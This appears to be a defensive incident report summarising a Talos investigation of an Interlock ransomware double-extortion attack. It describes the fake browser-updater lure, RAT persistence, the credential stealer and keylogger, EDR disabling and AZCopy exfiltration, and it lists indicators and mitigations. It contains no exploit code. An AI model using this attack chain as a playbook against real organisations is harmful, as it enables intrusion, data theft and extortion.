Full Report
Cisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game hunting and double extortion attacks using the relatively new Interlock ransomware.
Analysis Summary
# Incident Report: Interlock Ransomware Attack and Double Extortion
## Executive Summary
Cisco Talos Incident Response observed an attacker utilizing the emerging Interlock ransomware variant in a big-game hunting and double extortion campaign. The attacker achieved initial access via a fake browser updater leading to the deployment of a RAT, credential stealer, and keylogger over a 17-day dwelling period. The group successfully exfiltrated data using Azure Storage Explorer/AZCopy before deploying the final ransomware encryptor binary.
## Incident Details
- **Discovery Date:** Not explicitly stated, but analysis was ongoing as of November 7, 2024.
- **Incident Date:** Activity spanned approximately 17 days leading up to ransomware deployment.
- **Affected Organization:** Not explicitly disclosed, but the attacker targets healthcare, technology, U.S. government, and European manufacturing sectors.
- **Sector:** Varied (Healthcare, Technology, Government, Manufacturing).
- **Geography:** U.S. and Europe (based on reported targets).
## Timeline of Events
### Initial Access
- **Date/Time:** Approximately 17 days prior to ransomware deployment.
- **Vector:** A fake Google Chrome browser updater executable (`upd_2327991.exe`) downloaded from a compromised legitimate news website. The file was sourced from a second compromised legitimate retailer URL.
- **Details:** Clicking the executable downloaded the package, which was identified as a Remote Access Tool (RAT).
### Execution & Persistence
- The RAT automatically executed an embedded PowerShell script upon running.
- The script downloaded a legitimate Chrome setup executable (`ChromeSetup.exe`) to the temporary folder.
- Persistence was established by dropping a Windows shortcut file (`fahhs.lnk`) in the Windows StartUp folder to run the RAT upon user login.
- The RAT executed `systeminfo` to gather extensive system data, encrypted it, and exfiltrated it via a secured socket to the C2 server at `apple-online[.]shop` (Cloudflare protected).
- The RAT then downloaded, decrypted (using key `jgSkhg934@kjv#1vkfg2S`), and executed a credential stealer (`cht.exe`) and a keylogger (`klg.dll` run via `rundll32.exe`).
### Lateral Movement
- **Techniques:** Primarily utilized **Remote Desktop Protocol (RDP)**. Additionally observed using AnyDesk and PuTTY.
### Data Exfiltration/Impact
- **Vector:** Attacker used **Azure Storage Explorer**, leveraging the **AZCopy** utility, to exfiltrate victim data to an attacker-controlled Azure storage blob.
- **Impact:** Double extortion confirmed (data encrypted and data stolen).
### Detection & Response
- **Discovery:** Talos Incident Response conducted analysis based on observed TTPs.
- **Response actions taken:** Talos analysis was performed; organizational response details (containment, eradication) are not fully detailed in the provided text but internal response followed the identification of the execution chain.
## Attack Methodology
| Stage | Method/Techniques Used |
| :--- | :--- |
| **Initial Access** | Social engineering via a fake browser updater executable downloaded from a compromised trusted website. |
| **Persistence** | Dropped a Windows shortcut file (`fahhs.lnk`) in the Windows StartUp folder to launch the RAT upon login. |
| **Privilege Escalation** | Not explicitly detailed, but likely leveraged initial user context to run scripts. |
| **Defense Evasion** | Observed **EDR disabling** on compromised servers (possibly via an EDR uninstaller or driver instrumentation). |
| **Credential Access** | Deployed a dedicated **credential stealer** (`cht.exe`). |
| **Discovery** | RAT executed `systeminfo` to gather configuration details, memory usage, networking info, and OS builds. |
| **Lateral Movement** | Remote Desktop Protocol (RDP), AnyDesk, and PuTTY used to navigate the network. |
| **Collection** | Deployed a **keylogger** (`klg.dll`) and utilized a **credential stealer**. |
| **Exfiltration** | Used **Azure Storage Explorer** and **AZCopy** utility to upload data to an Azure storage blob. |
| **Impact** | Deployment and execution of the **Interlock ransomware encryptor binary**. |
## Impact Assessment
- **Financial:** Not quantified, but associated with big-game hunting attack costs.
- **Data Breach:** Sensitive data was exfiltrated prior to encryption (double extortion).
- **Operational:** Full system encryption following a 17-day dwell time, resulting in significant business disruption.
- **Reputational:** Public exposure of stolen data on the "Worldwide Secrets Blog" data leak site if the victim refuses to pay.
## Indicators of Compromise (Defanged)
- **Network indicators:** C2 domain: `apple-online[.]shop` (Cloudflare protected).
- **File indicators:** RAT (embedded in fake updater), PowerShell scripts, credential stealer (`cht.exe`), keylogger (`klg.dll`), shortcut file (`fahhs.lnk`).
- **Behavioral indicators:** Disabling of EDR, use of `rundll32.exe` to execute DLLs, data exfiltration via AZCopy utility.
## Response Actions
- **Containment:** (Implied) Isolation of affected systems and blocking C2 communication post-detection.
- **Eradication:** Not fully detailed, but would involve removing the RAT, persistence mechanisms, and all attacker executables.
- **Recovery:** Rebuilding/restoring encrypted systems, credential resets, and patching vulnerabilities that enabled initial access.
## Lessons Learned
- The attackers maintained a long dwelling time (17 days), indicating inadequate preventative controls and threat hunting capabilities.
- Sophisticated multi-stage delivery chain (Fake Updater -> RAT -> PowerShell -> Credential Theft/Keylogging).
- Attackers utilize legitimate cloud utilities (AZCopy) for high-volume, low-detection exfiltration.
- The group (Interlock) shows TTP similarities to Rhysida operators.
## Recommendations
- Implement robust multi-factor authentication (MFA) for RDP access.
- Thoroughly vet and monitor all software update prompts, especially those originating from external sources or unusual download sites.
- Deploy endpoint detection and response (EDR) solutions and ensure administrative controls prevent unauthorized disabling of security tooling.
- Monitor for the unauthorized use of utilities like AZCopy for data staging or exfiltration.
- Ensure all known vulnerabilities (explicitly mentioned as a targeting claim by Interlock operators) are patched promptly.